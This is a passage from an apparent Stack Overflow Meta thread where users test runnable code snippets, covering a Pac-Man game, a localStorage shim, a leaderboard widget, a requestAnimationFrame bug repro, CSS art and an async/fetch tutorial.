    .blank {
        background: #000000;
    }
    .port {
        background: #000000;
        z-index: 4;
    }
    .border-vertical {
        background-position: -1px -18px;
    }
    .corner-left-top {
        background-position: -1px -1px;
    }
    .border-horizontal {
        background-position: -19px -1px;
    }
    .corner-right-top {
        background-position: -221px -1px;
    }
    .corner-right-bottom {
        background-position: -41px -153px;
    }
    .corner-left-bottom {
        background-position: -1px -245px;
    }
    .double-down {
        background-position: -111px -1px;
    }
    .left-out {
        background-position: -63px -80px;
    }
    .right-out {
        background-position: -159px -80px;
    }
    .double-right {
        background-position: -1px -200px;
    }
    .double-left {
        background-position: -221px -200px;
    }
    .left-top {
        background-position: -21px -23px;
    }
    .right-top {
        background-position: -44px -23px;
    }
    .right-bottom {
        background-position: -44px -38px;
    }
    .left-bottom {
        background-position: -21px -38px;
    }
    .horizontal {
        background-position: -30px -38px;
    }
    .single-down {
        background-position: -63px -56px;
    }
    .single-up {
        background-position: -63px -105px;
    }
    .single-vertical {
        background-position: -63px -62px;
    }
    .single-horizontal {
        background-position: -78px -80px;
    }
    .ghost-gate {
        background-position: -111px -101px;
    }
    .single-right {
        background-position: -134px -80px;
    }
    .single-left {
        background-position: -92px -80px;
    }
    .left-down {
        background-position: -39px -176px;
    }
    .down-right {
        background-position: -183px -176px;
    }
    .split-up {
        background-position: -63px -224px;
    }
    .split-down {
        background-position: -111px -56px;
    }
    .ghost {
        z-index: 3;
    }
    .inky-left {
        background-position: -239px -9px;
    }
    .inky-right {
        background-position: -290px -9px;
    }
    .inky-top {
        background-position: -256px -9px;
    }
    .inky-down {
        background-position: -273px -9px;
    }
    .clyde-left {
        background-position: -239px -25px;
    }
    .clyde-right {
        background-position: -290px -25px;
    }
    .clyde-top {
        background-position: -256px -25px;
    }
    .clyde-down {
        background-position: -273px -25px;
    }
    .pinky-left {
        background-position: -239px -41px;
    }
    .pinky-right {
        background-position: -290px -41px;
    }
    .pinky-top {
        background-position: -256px -41px;
    }
    .pinky-down {
        background-position: -273px -41px;
    }
    .scared-0 {
        background-position: -256px -74px;
    }
    .scared-1 {
        background-position: -273px -74px;
    }
    .blinky-left {
        background-position: -239px -58px;
    }
    .blinky-right {
        background-position: -290px -58px;
    }
    .blinky-top {
        background-position: -256px -58px;
    }
    .blinky-down {
        background-position: -273px -58px;
    }
    #field {
        position: absolute;
        left: 50%;
        margin-left: -142.5px;
        top: 50%;
        margin-top: -172.5px;
        width: 285px;
        height: 345px;
    }
    #player {
        z-index: 3;
    }
    .pacman, .pacman-left-0, .pacman-top-0, .pacman-down-0, .pacman-right-0, .pacman-pauzed-0, .pacman-pauzed-1, .pacman-pauzed-2 {
        background-position: -269px -163px;
    }
    .pacman-left-1 {
        background-position: -253px -163px;
    }
    .pacman-left-2 {
        background-position: -237px -163px;
    }
    .pacman-top-1 {
        background-position: -269px -147px;
    }
    .pacman-top-2 {
        background-position: -268px -131px;
    }
    .pacman-right-1 {
        background-position: -285px -163px;
    }
    .pacman-right-2 {
        background-position: -301px -163px;
    }
    .pacman-down-1 {
        background-position: -269px -179px;
    }
    .pacman-down-2 {
        background-position: -269px -195px;
    }
    .point, .superball-0, .superball-1 {
        width: 8px;
        height: 8px;
        background-image: url('http://i50.tinypic.com/16c2nux.png');
        position: absolute;
    }
    .point, .superball, .superball-0 {
        background-position: -291px -78px;
    }
    .superball-1 {
        background-position: -300px -79px;
    }
    .scoreboard {
        border-spacing: 1px 1px;
        background-color: #000000;
        font-family:'Helvetica';
        font-variant: small-caps;
        text-transform: lowercase;
        width: 100%;
        position: absolute;
        top: -35px;
        left: 0px;
        right: 0px;
        font-size: 12px;
        letter-spacing: 1px;
    }
    .scoreboard td {
        padding-top: 1px;
        padding-bottom: 1px;
        padding-left: 5px;
        padding-right: 5px;
        background-color: #999999;
        color: #000000;
        text-align: center;
        width: 50%;
    }
    .scoreboard td.title {
        font-weight: 800;
    }
```

```html
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<div id="game">
     <h1>PACMAN</h1>
 <small>Sprites &copy; Super Goomba-Rio</small>

    <div id="field">
        <table class="scoreboard" id="scoreboard">
          <tr><td class="title">SCORE:</td><td class="title">Lifes</td></tr>
          <tr><td id="txtScore" align="right">0</td><td id="txtLives" align="center">3</td></tr>
        </table>
        <div id="player" class="sprite gc pacman"></div>
    </div>
</div>
```

Kinda late, but I thought why not

Answer (score 2):

This is a leaderboard example for [this question](https://codegolf.stackexchange.com/questions/183544/marquee-sign-letters/185038#185038). If you want to suggest a leaderboard as a comment, here's a comment template:

```
May I suggest a leaderboard for this post? [Here's](https://meta.stackoverflow.com/questions/269754/stack-snippets-sandbox-try-it-out-here/384473#384473) an example, and [here's](https://xmikee1.github.io/ppcg-leaderboard/implement) how to implement the leaderboard.
```

## Leaderboard

You can view the leaderboard for this post by expanding the widget/snippet below. In order for your post to be included in the rankings, you need a header (`# header text`) with the following info:

- The name of the language (end it with a comma `,` or dash `-`), followed by...
- The byte count, as the last number to appear in your header.

For example, `JavaScript (ES6), 72 bytes` is valid, but `Fortran, 143 bytes (8-bit)` is invalid because the byte count is not the last number in the header (your answer will be recognized as 8 bytes - don't take advantage of this).

```html
<iframe src="https://xmikee1.github.io/ppcg-leaderboard/?id=183544" width="100%" height="100%" style="border: none;">Oops, your browser is too old to view this content! Please upgrade to a newer version of your browser that supports HTML5.</iframe><style>html,body{margin:0;padding:0;height:100%;overflow:hidden}</style>
```

Answer (score 2):

## If you want to check if localStorage works in snippet

```js
try {
  const expected = 'minatozaki sana';
  let message = 'Testing localStorage...';
  window.localStorage.setItem('name', expected);
  const actual = window.localStorage.getItem('name');
  if (actual === expected) {
     message = 'localStorage does work in SO snippet';
  } else {
     message = `localStorage still does not work in SO snippet, expected '${expected}' but got: '${actual}'`;
  }

} catch (e) {
  message = `localStorage still does not work in SO snippet, threw exception:\n ${e}`;
}
document.getElementById('result').innerText = message;
```

```html
<div id="result">
Testing localStorage...
</div>
```

Comment: Note that there is a [feature request to add local storage capabilities to Stack Snippets already](https://meta.stackoverflow.com/q/345385/215552).

Comment: Allowing local storage in code snippets is quite dangerous. I was just curious to see if it works now.

Comment: Cool, just wanted to let you know that the lack of capability is a known issue :).

Comment: I already knew that. Turns out this is such an old question. I thought it was new one, because it showed up at the top of my question list. Thought a new feature just has been introduced. Meh...

Answer (score 2):

A sham for the Storage API that uses a `Map` backer and does not survive refresh (since Stack Snippets don't survive refresh). Might help with basic questions about the Storage API regarding serialization, or getting/setting values.

Can be included in Stack Snippets by including the following GitHub/JSDelivr script HTML:

```
<script src="https://cdn.jsdelivr.net/gh/mikemccaughan/heretic-monkey.link/FauxStorage.js"></script>
```

```js
// You can get/set using standard property-like getters and setters
localStore.test = 'value';
// They are separate stores 
console.log('sessionStore does not have a test key, so it returns null: ', sessionStore.test, `(${typeof sessionStore.test})`);
// You can get/set using Storage API
console.log(`localStore.getItem('test'):`, localStore.getItem('test'), `(${typeof localStore.test})`);
// stores only the string of the value
sessionStore.setItem('test', 123);
console.log(sessionStore.test, `(${typeof sessionStore.test})`);
sessionStore.test = {
  a: 'b'
};
console.log(sessionStore.test, `(${typeof sessionStore.test})`);
localStore.test = ['a', 1, {
  index: 2
}];
console.log(localStore.test, `(${typeof localStore.test})`);
// setting the value to null sets it to the string "null"
localStore.test = null;
console.log(localStore.test, `(${typeof localStore.test})`);
// setting the value to undefined sets it to the string "undefined"
localStore.test = undefined;
console.log(localStore.test, `(${typeof localStore.test})`);
// removing the item is the way to clear the value for the specific key (and it returns null when not found)
localStore.removeItem('test');
console.log(localStore.test, `(${typeof localStore.test}) <- note the type is object, since typeof null === 'object'`);
```

```html
<script src="https://cdn.jsdelivr.net/gh/mikemccaughan/heretic-monkey.link/FauxStorage.js"></script>
```

The actual code for those interested:

```js
// A sham for the Storage API that uses a `Map` backer and does not survive refresh 
// (since Stack Snippets don't survive refresh). Might help with basic questions about 
// the Storage API regarding serialization, or getting/setting values.
//
// Note you'll need to use localStore instead of localStorage and sessionStore instead 
// of sessionStorage to use the shams.

class FauxStorage {
  // private class fields do not have wide support as of this writing
  // #store = new Map();
  constructor() {
    let self = this;
    self.store = new Map();
    return new Proxy(this, {
      get(target, prop) {
        if (!(prop in target)) {
          return target.getItem(prop);
        }

        return target[prop];
      },
      set(target, prop, value) {
        if (!(prop in target)) {
          target.setItem(prop, value);
          return true;
        }

        return false;
      },
      getOwnPropertyDescriptor(target, prop) {
        return prop in target ? {
          value: target[prop],
          writable: false,
          enumerable: false,
          configurable: false
        } : {
          value: target.getItem(prop),
          writable: true,
          enumerable: true,
          configurable: true
        };
      }
    });
  }
  get length() {
    return this.store.size;
  }
  getItem(key) {
    return this.store.get(key) ?? null;
  }
  setItem(key, value) {
    this.store.set(key, String(value));
  }
  removeItem(key) {
    this.store.delete(key);
  }
  key(index) {
    return [...this.store.keys()][index];
  }
  clear() {
    this.store.clear();
  }
}
(function() {
  // Note: Requires new names because sandbox attribute on iframe denies access to localStorage/sessionStorage name, regardless of implementation.
  window.localStore = new FauxStorage();
  window.sessionStore = new FauxStorage();
})();
```

Answer (score 1):

This concerns [Merge two array of objects based on a key](https://stackoverflow.com/a/66689080).

Below, notice how `id: "abdc4051"` is the *first* item in the `arr1` array,
but the *second* item in the `arr2` array. (!)

```js
function merge(array,key){
    let map = {};
    array.forEach(val=>{
        if(map[val[key]]){
            map[val[key]] = {...map[val[key]],...val};
        }else{
            map[val[key]] = val;
        }
    })
    return Object.keys(map).map(val=>map[val]);
}
let arr1 = [
  { id: "abdc4051", date: "2017-01-24" }, 
  { id: "abdc4052", date: "2017-01-22" }
];
let arr2 = [
  { id: "abdc4052", name: "abc" },
  { id: "abdc4051", name: "ab"  }
];

document.write(JSON.stringify(merge( [...arr1,...arr2], 'id')));
```

The result is still the same. (Hooray!)

Answer (score 1):

```css
span {
  margin: 5px;
  padding: 5px;
  border:2px solid;
  color: red;
  border-radius:50%;
}
```

```html
Hello World<br />
<span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span><span>
</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span>
```

Comment: *[Hello, World!](https://en.wikipedia.org/wiki/%22Hello,_World!%22_program)*

Answer (score 1):

Testing [a bug with Chrome](https://crbug.com/1294146) (at least in macOS) where `requestAnimationFrame` fires far faster than screen refresh rate when scrolling if another Stack Snippet is running.

I unfortunately can't make a min-repro outside of Stack Exchange, so here it is...

---

Steps to reproduce:

- Run the first snippet, check the logged values. On a 60 Hz monitor, they should be around 60 FPS everywhere.
- Start scrolling the main page. The values may start changing a bit (though normally only `min` should).
- Run the second snippet and scroll back to the first one. See how `max` goes crazy out with numbers like 5,000 or 10,000 FPS (I believe the rounded value is due to `performance.now()`'s min precision, thanks Spectre). Checking the rAF timestamp in these frames gives us a difference of `0`: multiple callbacks did fire in a single frame).

```js
debugger; // apparently the code would be ran in both iframes?
const store = [];
let min = Infinity;
let max = -Infinity;
let lastRaf;
let rafID;
// start after everything warmed up
setTimeout(() => rafID = requestAnimationFrame(measure), 500);
function measure(rafTime) {
  // testing observations from Comment 7
  // make sure we have only one rAF(measure) scheduled at a time
  if (checkbox.checked) {
    cancelAnimationFrame(rafID);
  }
  const now = performance.now();
  if (store.length) {
    const diff = +(1000 / (now - store[store.length-1]));
    max = Math.max(diff, max);
    min = Math.min(diff, min);
    if(diff>1000) {
      console.log("timestamp-diff", rafTime - lastRaf);
    }
  }
  lastRaf = rafTime;
  store.push(now);
  if (store.length > 10) {
    store.shift();
  }
  const diffs = store.map((t,i,a) => (a[i+1]||t)-t);
  const sum = diffs.reduce((s,t) => s+t, 0);
  const avg = sum / (diffs.length - 1);
  log.textContent = `average: ${(1000 / avg).toFixed(2)}FPS
maximum: ${max.toFixed(2)}FPS
minimum: ${min.toFixed(2)}FPS`;
  rafID = requestAnimationFrame(measure)
}
```

```css
.as-console-wrapper { max-height: 110px !important; }
```

```html
<label><input type=checkbox id=checkbox> Cancel previous animation frame callback</label>
<pre id=log></pre>
```

```html
<h1>hello</h1>
```

Answer (score 1):

TypeScript is accepted if you use the Babel compiler option in the snippet.

```js
interface Problem {
  num1: number;
  num2: number;
}

interface SolvedProblem extends Problem {
  result: number;
}

function add(a: number, b: number) {
  return a + b;
}

function print(s: string) {
  console.log(s);
}

function solve(p: Problem): SolvedProblem {
  return {
    ...p,
    result: add(p.num1, p.num2)
  };
}

const solution: SolvedProblem  = solve({num1: 3, num2: 5});

const formatted: string = `The sum of ${solution.num1} and ${solution.num2} is ${solution.result}`;

print(formatted);
```

Answer (score 0):

```js
    //Made for Stack Overflow Code Testing

    //Unicorn Inspired by http://drbl.in/kayh

    //Made by Mr. Alien


    /*
     * Just created in a hurry, so won't refactor my CSS
     * as of now, also I can drastically reduce
     * the markup but I won't do it right now
    */
```

```css
    html, body {
      height: 450px;
      background: -webkit-radial-gradient(center, ellipse, #fce300 0%, #ffc700 46%, #ff7f00 100%);
      background: radial-gradient(ellipse at center, #fce300 0%,#ffc700 46%,#ff7f00 100%);
    }

    .unicorn {
      position: absolute;
      left: 50%;
      top: 170px;
      margin-left: -250px;
    }

    .tail > div,
    .body > div,
    .leg > div,
    .leg2 > div,
    .leg3 > div,
    .unihorn {
      width: 0; 
      height: 0;
      position: absolute;
      -webkit-transform-origin: 50% 50%;
          -ms-transform-origin: 50% 50%;
              transform-origin: 50% 50%;
    }

    .tail .pone{ 
      border-left: 30px solid transparent;
      border-right: 40px solid transparent;
      border-bottom: 30px solid #ffb82b;
      -webkit-transform: rotate(6deg);
          -ms-transform: rotate(6deg);
              transform: rotate(6deg);
    }

    .tail .ptwo {
      border-left: 40px solid transparent;
      border-right: 30px solid transparent;
      border-bottom: 30px solid #FD8A07;
      -webkit-transform: rotate(-39deg);
          -ms-transform: rotate(-39deg);
              transform: rotate(-39deg);
      top: 26px;
      left: -30px;
    }

    .tail .pthree {
      border-top: 30px solid transparent;
      border-bottom: 30px solid transparent; 
      border-right: 30px solid #ffb82b; 
      -webkit-transform: rotate(5deg); 
          -ms-transform: rotate(5deg); 
              transform: rotate(5deg);
      top: 45px;
      left: -12px;
    }

    .tail .pfour {
      top: 72px;
      left: 17px;
      border-bottom: 35px solid #FD8A07;
      border-right: 35px solid transparent;
      -webkit-transform: rotate(5deg);
          -ms-transform: rotate(5deg);
              transform: rotate(5deg);
    }

    div.body .pone {
      border-top: 10px solid transparent;
      border-left: 221px solid #FD8A07;
      border-bottom: 60px solid transparent;
      -webkit-transform: rotate(40deg);
          -ms-transform: rotate(40deg);
              transform: rotate(40deg);
      top: 65px;
      left: 45px;
    }

    div.body .ptwo {
      border-bottom: 70px solid #ffb82b;
      border-left: 90px solid transparent;
      border-right: 130px solid transparent;
      -webkit-transform: rotate(43deg);
          -ms-transform: rotate(43deg);
              transform: rotate(43deg);
      top: 15px;
      left: 87px;
    }

    div.body .pthree {
      border-bottom: 100px solid #FD8A07;
      border-left: 20px solid transparent;
      border-right: 130px solid transparent;
      -webkit-transform: rotate(71deg);
          -ms-transform: rotate(71deg);
              transform: rotate(71deg);
      top: 15px;
      left: 200px;
    }

    div.body .pfour {
      border-bottom: 100px solid #ffb82b;
      border-left: 30px solid transparent;
      border-right: 130px solid transparent;
      -webkit-transform: rotate(109deg);
          -ms-transform: rotate(109deg);
              transform: rotate(109deg);
      top: 38px;
      left: 246px;
    }

    div.body .pfive {
      border-bottom: 60px solid #FD8A07;
      border-right: 105px solid transparent;
      left: 310px;
      top: -27px;
      -webkit-transform: rotate(34deg);
          -ms-transform: rotate(34deg);
              transform: rotate(34deg);
    }

    div.body .psix {
      border-top: 85px solid #ffb82b;
      border-left: 85px solid transparent;
      left: 319px;
      top: -40px;
      -webkit-transform: rotate(19deg);
          -ms-transform: rotate(19deg);
              transform: rotate(19deg);
    }

    div.body .pseven {
      border-bottom: 110px solid #FD8A07;
      border-left: 85px solid transparent;
      left: 350px;
      top: -144px;
      -webkit-transform: rotate(19deg);
          -ms-transform: rotate(19deg);
              transform: rotate(19deg);
    }

    div.body .peight {
      border-bottom: 90px solid #ffb82b;
      border-right: 120px solid transparent;
      left: 425px;
      top: -92px;
      -webkit-transform: rotate(18deg);
          -ms-transform: rotate(18deg);
              transform: rotate(18deg);
    }

    div.body > div.eye {
      background-color: #000;
      top: -70px;
      left: 445px;
      height: 10px;
      width: 10px;
      border-radius: 50%;
      z-index: 1;
    }

    div.nose {
      border-bottom: 40px solid #f27d00;
      border-right: 40px solid transparent;
      -webkit-transform: rotate(-28deg);
          -ms-transform: rotate(-28deg);
              transform: rotate(-28deg);
      left: 480px;
      top: -15px;
    }

    div.extreme-left {
      border-top: 115px solid transparent;
      border-right: 30px solid #ffb82b;
      border-bottom: 110px solid transparent;
      -webkit-transform: rotate(-65deg);
          -ms-transform: rotate(-65deg);
              transform: rotate(-65deg);
      left: 130px;
      top: 4px;
    }

    div.leg .pone {
      border-top: 120px solid transparent;
      border-right: 60px solid #FD8A07;
      border-bottom: 0px solid transparent;
      -webkit-transform: rotate(-50deg);
          -ms-transform: rotate(-50deg);
              transform: rotate(-50deg);
      top: 55px;
      left: 45px; 
    }

    div.leg .ptwo {
      border-top: 20px solid transparent;
      border-right: 30px solid #ffb82b;
      border-bottom: 20px solid transparent;
      top: 145px;
      -webkit-transform: rotate(-24deg);
          -ms-transform: rotate(-24deg);
              transform: rotate(-24deg);
      left: 66px;
    }

    div.leg .pthree {
      border-top: 15px solid transparent;
      border-right: 33px solid #FD8A07;
      border-bottom: 20px solid transparent;
      top: 164px;
      -webkit-transform: rotate(34deg);
          -ms-transform: rotate(34deg);
              transform: rotate(34deg);
      left: 63px;
    }

    div.leg .pfour {
      border-left: 0 solid transparent;
      border-right: 20px solid transparent;
      border-bottom: 100px solid #ffb82b;
      -webkit-transform: rotate(-15deg);
          -ms-transform: rotate(-15deg);
              transform: rotate(-15deg);
      top: 165px;
      left: 80px;
    }

    div.leg .pfive {
      border-bottom: 30px solid #FD8A07;
      border-right: 30px solid transparent;
      top: 235px;
      -webkit-transform: rotate(-15deg);
          -ms-transform: rotate(-15deg);
              transform: rotate(-15deg);
      left: 89px;
    }

    div.body .extreme-right {
      left: 246px;
      top: 100px;
      border-top: 30px solid #FD8A07;
      border-left: 80px solid transparent;
      border-right: 85px solid transparent;
      -webkit-transform: rotate(-33deg);
          -ms-transform: rotate(-33deg);
              transform: rotate(-33deg);
    }

    div.leg2 div.pone {
      border-top: 50px solid #ffb82b;
      border-right: 85px solid transparent;
      left: 339px;
      top: 84px;
      -webkit-transform: rotate(-53deg);
          -ms-transform: rotate(-53deg);
              transform: rotate(-53deg);
    }

    div.leg2 div.ptwo {
      border-bottom: 20px solid #FD8A07;
      border-left: 42px solid transparent;
      border-right: 30px solid transparent;
      -webkit-transform: rotate(62deg);
          -ms-transform: rotate(62deg);
              transform: rotate(62deg);
      left: 328px;
      top: 146px;
    }

    div.leg2 .pthree {
      border-left: 0 solid transparent;
      border-right: 20px solid transparent;
      border-bottom: 100px solid #ffb82b;
      -webkit-transform: rotate(-15deg);
          -ms-transform: rotate(-15deg);
              transform: rotate(-15deg);
      top: 154px;
      left: 368px;
    }

    div.leg2 .pfour {
      border-bottom: 30px solid #FD8A07;
      border-right: 30px solid transparent;
      top: 230px;
      -webkit-transform: rotate(-15deg);
          -ms-transform: rotate(-15deg);
              transform: rotate(-15deg);
      left: 378px;
    }

    div.leg3 div.pone {
      border-top: 50px solid transparent;
      border-left: 60px solid #ef7b00;
      border-bottom: 30px solid transparent;
      left: 382px;
      top: 60px;
      -webkit-transform: rotate(6deg);
          -ms-transform: rotate(6deg);
              transform: rotate(6deg);
    }

    div.leg3 div.ptwo {
      border-left: 0px solid transparent;
      border-right: 30px solid transparent;
      border-top: 50px solid #e87604;
      left: 419px;
      top: 116px;
      -webkit-transform: rotate(-18deg);
          -ms-transform: rotate(-18deg);
              transform: rotate(-18deg);
    }

    div.leg3 div.pthree {
      border-bottom: 30px solid #e5892d;
      border-left: 13px solid transparent;
      left: 411px;
      top: 143px;
      -webkit-transform: rotate(-17deg);
          -ms-transform: rotate(-17deg);
              transform: rotate(-17deg);
    }

    div.leg3 .pfour {
      border-bottom: 30px solid #FD8A07;
      border-right: 30px solid transparent;
      top: 173px;
      -webkit-transform: rotate(76deg);
          -ms-transform: rotate(76deg);
              transform: rotate(76deg);
      left: 403px;
    }

    .unihorn {
      top: -130px;
      left: 446px;
      border-top: 10px solid transparent;
      border-left: 120px solid #FD8A07;
      border-bottom: 10px solid transparent;
      -webkit-transform: rotate(-36deg);
          -ms-transform: rotate(-36deg);
              transform: rotate(-36deg);
    }
```

```html
    <div class="unicorn">
      <div class="tail">
        <div class="pone"></div>
        <div class="ptwo"></div>
        <div class="pthree"></div>
        <div class="pfour"></div>
      </div>
      <div class="body">
        <div class="pone"></div>
        <div class="ptwo"></div>
        <div class="pthree"></div>
        <div class="pfour"></div>
        <div class="pfive"></div>
        <div class="psix"></div>
        <div class="pseven"></div>
        <div class="peight"></div>
        <div class="eye"></div>
        <div class="nose"></div>
        <div class="extreme-left"></div>
        <div class="extreme-right"></div>
      </div>
      <div class="leg">
        <div class="pone"></div>
        <div class="ptwo"></div>
        <div class="pthree"></div>
        <div class="pfour"></div>
        <div class="pfive"></div>
      </div>
      <div class="leg2">
        <div class="pone"></div>
        <div class="ptwo"></div>
        <div class="pthree"></div>
        <div class="pfour"></div>
      </div>
      <div class="leg3">
        <div class="pone"></div>
        <div class="ptwo"></div>
        <div class="pthree"></div>
        <div class="pfour"></div>
      </div>
      <div class="unihorn"></div>
    </div>
```

Answer (score 0):

#### 1. A first stumbling step

As for many others, my encounter with asynchronous calls was puzzling at first. 
I don't remember the details, but I may have tried something like:

```js
let result;

$.ajax({
  url: 'https://jsonplaceholder.typicode.com/todos/1',
  success: function (response) {
    console.log('\nInside $.ajax:');
    console.log(response);
    result = response;
  },
});

console.log('Finally, the result: ' + result);
```

```css
.as-console-wrapper { max-height: 100% !important; top: 0; }
```

```html
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
```

*Whoops!* 
The output of the line
`console.log('Finally, the result: ' + result);`
which I thought would be printed *last*, is actually printed *before* the other output! 
– And it doesn't contain the result: it just prints `undefined`. <sup>1</sup> 
How come?

###### A helpful insight

I distinctly remember my first *aha* () moment about asynchronous calls.
It was :

> [you actually don't want to get the data *out* of a callback; you want to get your data-needing action *into* the callback!](https://stackoverflow.com/q/44298196#comment75602602_44298196)
> <sup>2</sup>

This is obviously true in the example above.

#### 2. Plain JavaScript and a callback function

Luckily, it is possible to write code *after* the asynchronous call that deals with the response once it has completed.

One alternative is the use of a *callback* function in a [continuation-passing style](https://en.wikipedia.org/wiki/Continuation-passing_style) :
<sup>3</sup>

```js
const url = 'https://jsonplaceholder.typicode.com/todos/2';

function asynchronousFunc(callback) {
  const request = new XMLHttpRequest();
  request.open('GET', url);
  request.send();
  request.onload = function () {
    if (request.readyState === request.DONE) {
      console.log('The request is done. Now calling back.');
      callback(request.responseText);
    }
  };
}

asynchronousFunc(function (result) {
  console.log('This is the start of the callback function. Result:');
  console.log(result);
  console.log('The callback function finishes on this line. THE END!');
});

console.log('LAST in the code, but executed FIRST!');
```

```css
.as-console-wrapper { max-height: 100% !important; top: 0; }
```

Note how the function `asynchronousFunc` is `void`. It returns nothing. 
`asynchronousFunc` is called with an anonymous callback function, 
(`asynchronousFunc(function (result) {...});`). 
This executes the desired actions on the result *after* the request has completed – when the `responseText` is available.

Running the above snippet shows how I will probably not want to write any code *after* the asynchronous call (such as the line
`LAST in the code, but executed FIRST!`). 
*Why?* – Because such code will run *before* the asynchronous call delivers any response data. 
Doing so is bound to cause confusion when comparing the *code* with the *output*.

#### 3. Promise with `.then()`

The `.then()` construct was introduced in the *ECMA-262 6th Edition in June 2015*. 
The code below is plain JavaScript, replacing the old-school *XMLHttpRequest* with [*Fetch*](https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API/Using_Fetch). <sup>4</sup>

```js
fetch('https://api.chucknorris.io/jokes/random')
  .then((response) => response.json())
  .then((responseBody) => {
    console.log('Using .then() :');
    console.log(responseBody.value + '\n');
  });
```

```css
.as-console-wrapper { max-height: 100% !important; top: 0; }
```

#### 4. Promise with `async`/`await`

The `async`/`await` construct was introduced in the *ECMA-262 8th Edition in June 2017*.

```js
async function awaitAndReceivePromise() {
  const responseBody = (
    await fetch('https://api.quotable.io/quotes/random')
  ).json();
  console.log('Using async/await:');
  const obj = (await responseBody)[0];
  console.log('"' + obj.content + '" – ' + obj.author + '\n');
}

awaitAndReceivePromise();
```

```css
.as-console-wrapper { max-height: 100% !important; top: 0; }
```

A word of warning is warranted if you decide to go with the `async`/`await` construct.
Note in the above snippet how `await` is needed in *two* places.
If forgotten in the first place, there will be no output at all.
If forgotten in the second place, the only output will be `Using async/await:` – nothing else gets printed. 
Forgetting the `async` prefix of the function is maybe the worst of all – you'll get a `"SyntaxError"` – and likely *no hint about the missing* `async` keyword.

---

All the above examples succinctly convey how asynchronous calls may be used on toyish APIs. <sup>5</sup>

### References

- [Some questions and answers about asynchronous calls](https://stackoverflow.com/a/67662000)
- [Using plain JavaScript and a callback function](https://stackoverflow.com/a/16825593)
- [Continuation-passing style](https://en.wikipedia.org/wiki/Continuation-passing_style)
- [XMLHttpRequest at mdn web docs](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest)
- [XMLHttpRequest: onload vs. onreadystatechange](https://stackoverflow.com/a/19247992)
- [XMLHttpRequest.responseText](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest/responseText)
- [An example demonstrating `async`/`await`](https://stackoverflow.com/a/48415961)
- [Using the Fetch API](https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API/Using_Fetch)
- [Using promises](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Using_promises)
- [The XMLHttpRequest Standard](https://xhr.spec.whatwg.org)
- [The Fetch Standard](https://fetch.spec.whatwg.org)
- [The Web Hypertext Application Technology Working Group (WHATWG)](https://whatwg.org/news/start)
- [Links to ECMA specifications](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Language_Resources)
- [How can I fetch an array of URLs with Promise.all?](https://stackoverflow.com/a/67671337)

---

<sup>1</sup>
Expressed by the asker of the question as: *they all return `undefined`*.

<sup>2</sup>
Here is more on how [asynchronous calls may be confusing at first](https://stackoverflow.com/a/67662000).

<sup>3</sup>
Like the *X* in *AJAX*, the name `XMLHttpRequest` is misleading –
[it can be used to retrieve any type of data](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest). 
These days, the data format of Web APIs is ubiquitously JSON, not XML.

<sup>4</sup>
[Fetch](https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API/Using_Fetch) returns a [Promise](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Using_promises).
I was surprised to learn that neither *XMLHttpRequest* nor *Fetch* are part of the *ECMAScript* standard.
The reason JavaScript can access them here is that the web browser provides them. 
[The Fetch Standard](https://fetch.spec.whatwg.org) and [the XMLHttpRequest Standard](https://xhr.spec.whatwg.org) are both upheld by [the Web Hypertext Application Technology Working Group](https://whatwg.org/news/start) that was formed in June 2004. \

<sup>5</sup>
You might also be interested in
[How can I fetch an array of URLs with Promise.all?](https://stackoverflow.com/a/67671337).

Comment: That's a syntax error in _your_ JS, not a problem with stack snippets... `new Date().getTime()` would be correct.

Answer (score 0):

Trying rollback.

```js
var foo = 5;
```

Testing assemby highlighting:

```avrasm
.data
num: .int 2     # Declare an integer variable num with value 2

.text
.globl _start

_start:
    movl num, %eax # num stores an address, take the value inside that address into eax
    movl $num, %ebx # num stores an address, $ tells us to take the address itself into ebx
    leal num, %ecx # num stores an address, take the address itself into ecx (lea)

    #initialize
    movl $0, %eax
    movl $0, %ebx
    movl $0, %ecx

    movl $num, %edx # num stores an address, take the address itself into edx
    movl %edx, %eax # edx is an address, take the value inside that address into eax
    leal (%edx), %ecx # () tells us to go to the address inside edx, take the address itself into ecx (lea)
    movl (%edx), %ebx # () tells us to go to the address inside edx, take the value inside that address into ebx

    # Exit
    movl $1, %eax     # System call number for exit
    xorl %ebx, %ebx   # Exit status 0
    int $0x80         # Invoke the syscall
```

Answer (score -1):

#### Loading external image

```js
document.getElementById('foo-image').parentNode.style.border = '4px solid black';
```

```html
<p id="bar-p">
  <img src="http://via.placeholder.com/500x500/404F5C/F5EDDF?text=Placeholder Image" id="foo-image" alt="Placeholder Image" />
</p>
```

Answer (score -1):

```js
<!-- alert("You can even do alerts."); -->
console.log("AND log to the console.");
```

```css
.hello {
  font-weight: bold;
  font-size: 1.5em;
}
.ref {
  font-size: 1em;
}
```

```html
<div><p class="hello">Stack Snippets allow you to make code runnable.</p>
<p class="ref">Reference: <a href="https://meta.stackoverflow.com/questions/269753">https://meta.stackoverflow.com/questions/269753</a></p>
</div>
```

Comment: "Obviously the same rules apply: code-only questions or answers will still be blocked" [https://meta.stackoverflow.com/questions/269753](https://meta.stackoverflow.com/questions/269753) - Is this sandbox an exception?

